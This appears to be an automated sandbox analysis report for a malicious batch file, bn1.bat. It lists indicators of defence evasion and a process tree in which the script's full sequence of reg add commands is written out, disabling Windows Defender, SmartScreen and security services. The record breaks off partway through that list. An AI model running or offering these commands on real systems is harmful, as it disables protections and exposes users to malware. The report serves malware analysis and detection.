a6e96840029b64d72ddfd94ede969f521e1c05b91d5c23eee56b66afae6800c0

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
08-11-2024 02:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$_39_/bn1.bat
Size

9KB
MD5

95177638f9e6c0c5f4ae5b598a373ca2
SHA1

fca0880d545b3937ceafa4f6ad0ece12168e2921
SHA256

606e86d58f2c47eff90ad4b78463ca866854a278adeb09d06a29395a1b8aea89
SHA512

55236ad069d9d4347bd2951bc5c5a05f5466e6a7937ec36b903dfb3e72c37bfb33ff610e42006a2da56c07c668cea0cb416fa412663c8d7c80ebc0641cd2d962
SSDEEP

192:5yeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6gF8XM9LjZApFpQjTN:4K

Score

10^/10

defense_evasion evasion execution trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe

Modifies Security services 2 TTPs 10 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4"	reg.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Logs\CBS\CbsPersist_20241108023855.cab	makecab.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2704	powershell.exe
1256	powershell.exe
2432	powershell.exe

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	PowerRun64.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun64.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2316	PowerRun64.exe
2316	PowerRun64.exe
1484	PowerRun64.exe
1484	PowerRun64.exe
2020	PowerRun64.exe
2020	PowerRun64.exe
316	PowerRun64.exe
316	PowerRun64.exe
1948	PowerRun64.exe
1948	PowerRun64.exe
2916	PowerRun64.exe
2916	PowerRun64.exe
2280	PowerRun64.exe
2280	PowerRun64.exe
2464	PowerRun64.exe
2464	PowerRun64.exe
1036	PowerRun64.exe
1036	PowerRun64.exe
1268	PowerRun64.exe
1268	PowerRun64.exe
2628	PowerRun64.exe
2628	PowerRun64.exe
2052	PowerRun64.exe
2052	PowerRun64.exe
3056	PowerRun64.exe
3056	PowerRun64.exe
2968	PowerRun64.exe
2968	PowerRun64.exe
2216	PowerRun64.exe
2216	PowerRun64.exe
2420	PowerRun64.exe
2420	PowerRun64.exe
2876	PowerRun64.exe
2716	PowerRun64.exe
2716	PowerRun64.exe
2432	PowerRun64.exe
2432	PowerRun64.exe
2876	PowerRun64.exe
2352	PowerRun64.exe
2352	PowerRun64.exe
2272	PowerRun64.exe
2272	PowerRun64.exe
1136	PowerRun64.exe
2276	PowerRun64.exe
2276	PowerRun64.exe
2652	PowerRun64.exe
2652	PowerRun64.exe
1136	PowerRun64.exe
1336	PowerRun64.exe
1564	PowerRun64.exe
2172	PowerRun64.exe
2172	PowerRun64.exe
1336	PowerRun64.exe
1760	PowerRun64.exe
1564	PowerRun64.exe
1760	PowerRun64.exe
3000	PowerRun64.exe
3000	PowerRun64.exe
2972	PowerRun64.exe
2972	PowerRun64.exe
2704	powershell.exe
1524	PowerRun64.exe
2700	PowerRun64.exe
2700	PowerRun64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2316	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2316	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2316	PowerRun64.exe
Token: 0	2316	PowerRun64.exe
Token: SeDebugPrivilege	1484	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1484	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1484	PowerRun64.exe
Token: 0	1484	PowerRun64.exe
Token: SeDebugPrivilege	316	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	316	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	316	PowerRun64.exe
Token: SeDebugPrivilege	2020	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2020	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2020	PowerRun64.exe
Token: 0	2020	PowerRun64.exe
Token: SeDebugPrivilege	1524	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1524	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1524	PowerRun64.exe
Token: SeDebugPrivilege	1948	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1948	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1948	PowerRun64.exe
Token: SeDebugPrivilege	2916	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2916	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2916	PowerRun64.exe
Token: 0	2916	PowerRun64.exe
Token: SeDebugPrivilege	2280	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2280	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2280	PowerRun64.exe
Token: SeDebugPrivilege	2464	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2464	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2464	PowerRun64.exe
Token: 0	2464	PowerRun64.exe
Token: SeDebugPrivilege	1036	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1036	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1036	PowerRun64.exe
Token: SeDebugPrivilege	1268	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1268	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1268	PowerRun64.exe
Token: 0	1268	PowerRun64.exe
Token: SeDebugPrivilege	2628	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2628	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2628	PowerRun64.exe
Token: SeDebugPrivilege	2052	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2052	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2052	PowerRun64.exe
Token: 0	2052	PowerRun64.exe
Token: SeDebugPrivilege	3056	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	3056	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	3056	PowerRun64.exe
Token: 0	3056	PowerRun64.exe
Token: SeDebugPrivilege	2968	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2968	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2968	PowerRun64.exe
Token: 0	2968	PowerRun64.exe
Token: SeDebugPrivilege	2216	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2216	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2216	PowerRun64.exe
Token: SeDebugPrivilege	2876	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2876	PowerRun64.exe
Token: SeDebugPrivilege	2420	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2420	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2420	PowerRun64.exe
Token: 0	2420	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2876	PowerRun64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3032 wrote to memory of 2336	3032	cmd.exe	31
PID 3032 wrote to memory of 2336	3032	cmd.exe	31
PID 3032 wrote to memory of 2336	3032	cmd.exe	31
PID 3032 wrote to memory of 2120	3032	cmd.exe	32
PID 3032 wrote to memory of 2120	3032	cmd.exe	32
PID 3032 wrote to memory of 2120	3032	cmd.exe	32
PID 3032 wrote to memory of 1728	3032	cmd.exe	33
PID 3032 wrote to memory of 1728	3032	cmd.exe	33
PID 3032 wrote to memory of 1728	3032	cmd.exe	33
PID 3032 wrote to memory of 2612	3032	cmd.exe	34
PID 3032 wrote to memory of 2612	3032	cmd.exe	34
PID 3032 wrote to memory of 2612	3032	cmd.exe	34
PID 3032 wrote to memory of 2608	3032	cmd.exe	35
PID 3032 wrote to memory of 2608	3032	cmd.exe	35
PID 3032 wrote to memory of 2608	3032	cmd.exe	35
PID 3032 wrote to memory of 1500	3032	cmd.exe	36
PID 3032 wrote to memory of 1500	3032	cmd.exe	36
PID 3032 wrote to memory of 1500	3032	cmd.exe	36
PID 3032 wrote to memory of 1492	3032	cmd.exe	37
PID 3032 wrote to memory of 1492	3032	cmd.exe	37
PID 3032 wrote to memory of 1492	3032	cmd.exe	37
PID 3032 wrote to memory of 640	3032	cmd.exe	38
PID 3032 wrote to memory of 640	3032	cmd.exe	38
PID 3032 wrote to memory of 640	3032	cmd.exe	38
PID 3032 wrote to memory of 2492	3032	cmd.exe	39
PID 3032 wrote to memory of 2492	3032	cmd.exe	39
PID 3032 wrote to memory of 2492	3032	cmd.exe	39
PID 3032 wrote to memory of 2496	3032	cmd.exe	40
PID 3032 wrote to memory of 2496	3032	cmd.exe	40
PID 3032 wrote to memory of 2496	3032	cmd.exe	40
PID 3032 wrote to memory of 2500	3032	cmd.exe	41
PID 3032 wrote to memory of 2500	3032	cmd.exe	41
PID 3032 wrote to memory of 2500	3032	cmd.exe	41
PID 3032 wrote to memory of 2092	3032	cmd.exe	42
PID 3032 wrote to memory of 2092	3032	cmd.exe	42
PID 3032 wrote to memory of 2092	3032	cmd.exe	42
PID 3032 wrote to memory of 2312	3032	cmd.exe	43
PID 3032 wrote to memory of 2312	3032	cmd.exe	43
PID 3032 wrote to memory of 2312	3032	cmd.exe	43
PID 3032 wrote to memory of 2252	3032	cmd.exe	44
PID 3032 wrote to memory of 2252	3032	cmd.exe	44
PID 3032 wrote to memory of 2252	3032	cmd.exe	44
PID 3032 wrote to memory of 2060	3032	cmd.exe	45
PID 3032 wrote to memory of 2060	3032	cmd.exe	45
PID 3032 wrote to memory of 2060	3032	cmd.exe	45
PID 3032 wrote to memory of 1040	3032	cmd.exe	46
PID 3032 wrote to memory of 1040	3032	cmd.exe	46
PID 3032 wrote to memory of 1040	3032	cmd.exe	46
PID 3032 wrote to memory of 2560	3032	cmd.exe	47
PID 3032 wrote to memory of 2560	3032	cmd.exe	47
PID 3032 wrote to memory of 2560	3032	cmd.exe	47
PID 3032 wrote to memory of 2536	3032	cmd.exe	48
PID 3032 wrote to memory of 2536	3032	cmd.exe	48
PID 3032 wrote to memory of 2536	3032	cmd.exe	48
PID 3032 wrote to memory of 2784	3032	cmd.exe	49
PID 3032 wrote to memory of 2784	3032	cmd.exe	49
PID 3032 wrote to memory of 2784	3032	cmd.exe	49
PID 3032 wrote to memory of 2800	3032	cmd.exe	50
PID 3032 wrote to memory of 2800	3032	cmd.exe	50
PID 3032 wrote to memory of 2800	3032	cmd.exe	50
PID 3032 wrote to memory of 1828	3032	cmd.exe	51
PID 3032 wrote to memory of 1828	3032	cmd.exe	51
PID 3032 wrote to memory of 1828	3032	cmd.exe	51
PID 3032 wrote to memory of 580	3032	cmd.exe	52

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\$_39_\bn1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3032
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
  2⤵
  PID:2336
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
  2⤵
  PID:2120
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
  2⤵
  PID:1728
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
  2⤵
  PID:2612
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
  2⤵
  PID:2608
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
  2⤵
  PID:1500
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
  2⤵
  PID:1492
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
  2⤵
  PID:640
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
  2⤵
  PID:2492
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
  2⤵
  PID:2496
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
  2⤵
  PID:2500
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
  2⤵
  PID:2092
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
  2⤵
  PID:2312
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
  2⤵
  PID:2252
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
  2⤵
  PID:2060
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1040
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2560
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2536
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2784
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2800
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1828
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:580
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
  2⤵
  PID:2828
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:2820
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:2964
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:2980
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:2984
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
  2⤵
  PID:2988
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
  2⤵
  PID:3044
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
  2⤵
  PID:2968
- C:\Windows\system32\reg.exe
